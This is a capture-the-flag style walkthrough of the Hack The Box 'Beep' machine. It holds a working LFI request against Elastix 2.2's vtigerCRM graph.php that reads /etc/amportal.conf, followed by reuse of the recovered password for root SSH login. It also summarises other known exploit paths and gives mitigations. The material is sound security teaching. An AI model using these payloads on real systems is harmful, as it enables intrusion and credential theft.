beep · foobarto.me

Summary

The LFI + credential-reuse path lands root in ~5 minutes. Two 2026-specific client gotchas required adjustments beyond the original recipes (see “2026 client adjustments” below).

Beep is a famously broad HTB Linux Easy: more than a dozen open ports, an EOL CentOS 5 / Elastix 2.2.0 PBX install, and at least five independent paths to root. The shortest is a one-shot CVE-2012-4869 LFI in Elastix’s bundled vtigerCRM module (/vtigercrm/graph.php) that reads /etc/amportal.conf — and that file contains the FreePBX admin password in clear. Because Elastix uses the same password for every administrative surface (FreePBX admin, Webmin, system root SSH), the recovered credential unlocks ssh root@<TARGET> directly. The user flag and root flag are both on the same shell, no escalation needed.

The teaching beats are layered: (a) password reuse across surfaces is catastrophic — one config file leaks credentials that work for four services; (b) legacy SSH ciphers are a recurring 2026 gotcha — the modern OpenSSH client refuses CentOS 5’s old key exchange and HMAC by default and will hang on the banner unless told to fall back; (c) broad attack-surface boxes are an exercise in triage — newcomers spend hours fuzzing every port; experienced operators find the LFI in 5 minutes by knowing the version-to-CVE mapping for Elastix 2.2.

This writeup walks the LFI-and-credential-reuse path because it is shortest and highest-yield. Five additional paths (FreePBX RCE, Shellshock via Webmin/cgi-bin, asterisk-user nmap interactive escape, SMTP-to-LFI webshell injection, default Elastix admin/admin) are mentioned in passing.

Recon

nmap -sC -sV -p- --min-rate=2000 -oN nmap/full.txt <TARGET>

22/tcp    open  ssh         OpenSSH 4.3 (CentOS)
25/tcp    open  smtp        Postfix
80/tcp    open  http        Apache 2.2.3 (CentOS)
110/tcp   open  pop3        Cyrus pop3d
111/tcp   open  rpcbind     2 (RPC #100000)
143/tcp   open  imap        Cyrus imapd
443/tcp   open  https       Apache 2.2.3 (CentOS)
993/tcp   open  imaps       Cyrus imapd
995/tcp   open  pop3s       Cyrus pop3d
3306/tcp  open  mysql       MySQL (access denied)
4445/tcp  open  upnotifyp
4559/tcp  open  hylafax     HylaFAX 4.3.10
5038/tcp  open  asterisk    Asterisk Call Manager 1.1
10000/tcp open  http        MiniServ 1.570 (Webmin)

The OpenSSH 4.3 + Apache 2.2.3 + CentOS 5 banner family pins this as a CentOS 5 / RHEL 5 era host (2007-2010). The HylaFAX + Asterisk Call Manager + Cyrus mail combo is the giveaway for Elastix — a PBX distribution that bundles Asterisk, FreePBX, HylaFAX, Cyrus, postfix, and a handful of web admin panels into a single appliance.

Browsing https://<TARGET>/ redirects to the Elastix web admin landing page. The page footer reveals Elastix 2.2.0 — released 2011, with a documented LFI (CVE-2012-4869) and several RCEs in the bundled vtigerCRM and FreePBX modules.

The version banner alone is enough to pick a path. Elastix 2.2.0

vtigerCRM = LFI; recover the admin password from /etc/amportal.conf and credential-reuse into SSH.

2026 client adjustments

Two recipes from older walkthroughs need updating to work with modern Kali/Debian tooling:

curl against the Elastix HTTPS endpoint — modern OpenSSL rejects TLS 1.0, SHA-1 certs, and small DH groups by default. Need both the TLS pin and @SECLEVEL=0:

curl -sk --tlsv1.0 --tls-max 1.0 --ciphers 'DEFAULT:@SECLEVEL=0' "https://<TARGET>/..."

Symptom without these: error:0A000102:SSL routines::unsupported protocol.

ssh against OpenSSH 4.3 — in addition to the legacy KEX and HostKey algorithms, OpenSSH 9.x also disables ssh-rsa in PubkeyAcceptedAlgorithms by default:

ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 \
    -oHostKeyAlgorithms=+ssh-rsa \
    -oPubkeyAcceptedAlgorithms=+ssh-rsa \
    -c 3des-cbc \
    root@<TARGET>

Foothold — CVE-2012-4869 (Elastix vtigerCRM LFI)

The vtigerCRM module shipped with Elastix 2.2 includes a graph.php endpoint that uses the current_language parameter to include a PHP file from a relative path:

GET /vtigercrm/graph.php?current_language=../../../../../../../../etc/amportal.conf%00&module=Accounts&action HTTP/1.1

The %00 truncates the engine’s auto-appended .php, and the traversal sequence reaches /etc/amportal.conf. The response inlines the file’s contents into the rendered HTML. The load-bearing line:

AMPDBPASS=somepassword

(Plus AMPMGRPASS, AMPMGRUSER — all the same password.)

amportal.conf is FreePBX’s master configuration file and holds the admin password in plaintext. On Elastix 2.2 the same password is used for the system root account, the FreePBX admin panel, the Webmin instance on tcp/10000, the asterisk manager on tcp/5038, and the MySQL root account. One leak → five services unlocked.

Foothold — SSH as root

ssh root@<TARGET>

Modern OpenSSH (≥9.x) rejects the legacy ciphers Elastix 2.2’s sshd advertises. The connection hangs at kex_exchange_identi fication. Force the legacy modes:

ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 \
    -oHostKeyAlgorithms=+ssh-rsa \
    -oPubkeyAcceptedAlgorithms=+ssh-rsa \
    -c 3des-cbc \
    root@<TARGET>

Password: the value recovered from amportal.conf. (See “2026 client adjustments” above for why PubkeyAcceptedAlgorithms is now needed.)

[root@beep ~]# id
uid=0(root) gid=0(root) ...
[root@beep ~]# cat /home/fanis/user.txt
[root@beep ~]# cat /root/root.txt

There is no separate user-to-root step on Beep — root is the foothold. The user flag is owned by fanis, but root reads it trivially.

Alternative paths (summarised)

For completeness — all of these land root or root-equivalent:

FreePBX RCE (CVE-2014-7235): the FreePBX admin recordings/misc/callme_page.php POST is vulnerable to PHP extract()-driven variable overwriting that yields a webshell. ExploitDB 36941. Requires no creds.
Shellshock via Webmin / cgi-bin (CVE-2014-6271): the Webmin instance at tcp/10000 is built on bash scripts and is vulnerable to the standard Shellshock User-Agent injection.
Default Elastix admin/admin: the Elastix admin panel sometimes ships with default credentials. Worth a quick try on any Elastix install.
asterisk user sudo nmap: post-foothold-as-asterisk, nmap --interactive (the legacy mode) drops to a shell; when invoked via sudo, the spawned shell inherits privileges. ExploitDB 11005.
SMTP-to-LFI webshell: send a PHP-bodied email; the Cyrus IMAP message store is in a path the LFI can reach; include the message file via the same graph.php vector for arbitrary RCE.

The LFI + credential-reuse is the shortest. The FreePBX RCE and Shellshock paths are pedagogically valuable (one’s a PHP type-juggling bug, the other’s the reference Shellshock vector), but neither is shorter than reading one config file.

Why each step worked

vtigerCRM graph.php include($_GET['current_language'] . '.php'): the file inclusion is built from a user-controlled string concatenated with a fixed extension. Path traversal + null-byte truncation reaches anything on disk. The fix (Elastix 2.3+) was to validate the parameter against an allow-list of language codes.
Plaintext password storage in amportal.conf: FreePBX’s AMP requires runtime access to the password, and the designers chose plaintext config over an at-rest encrypted alternative. The mitigation is to make amportal.conf mode 0600 and root-owned (it isn’t on the appliance image).
Credential reuse across services: the Elastix appliance installer prompts for a single admin password and uses it for FreePBX, Webmin, asterisk manager, MySQL root, and system root. The convenience-vs-security tradeoff is set far to the convenience end.
Legacy SSH ciphers: OpenSSH 4.3 (2006) advertises ssh-rsa, diffie-hellman-group1-sha1, and 3des-cbc, which modern clients (≥9.x) reject by default.

Counterfactuals

Patch Elastix to 2.3+ (or migrate off; Elastix-2 is EOL). CVE-2012-4869 was fixed in 2.3.
Do not store plaintext passwords in world-readable config files. Move the FreePBX AMP password to a root-owned 0600 file or to a credential vault.
Do not reuse passwords across services. Even if amportal. conf is compromised, the SSH path should require a separate credential.
Disable Webmin on production PBX appliances; it is a large attack surface for marginal value.
Disable legacy SSH key-exchange and ciphers on the server (SSHD config). On the client side, force-enabling them only to talk to legacy hosts is the correct response — but do not globally enable them in ~/.ssh/config.

Key Takeaways

An LFI on a known-vulnerable web app + a config file that contains the admin password = full compromise in two HTTP requests. Always grep the bundled-app version against the CVE database before wordlist-fuzzing the surface.
Password reuse turns one bug into many: the attacker’s reward for finding any single credential leak is access to every service that shares the password. Treat any leaked cleartext credential as compromising every account that could plausibly be using the same secret.
Modern SSH client failures against legacy hosts are configuration, not vulnerability — keep the -oKexAlgorithms=+... recipe handy for old appliances.

References

0xdf, “HTB: Beep”
IppSec, “Beep”
ExploitDB 18650 (CVE-2012-4869, Elastix LFI)
ExploitDB 36941 (CVE-2014-7235, FreePBX recordings RCE)
Elastix project security advisory (2012)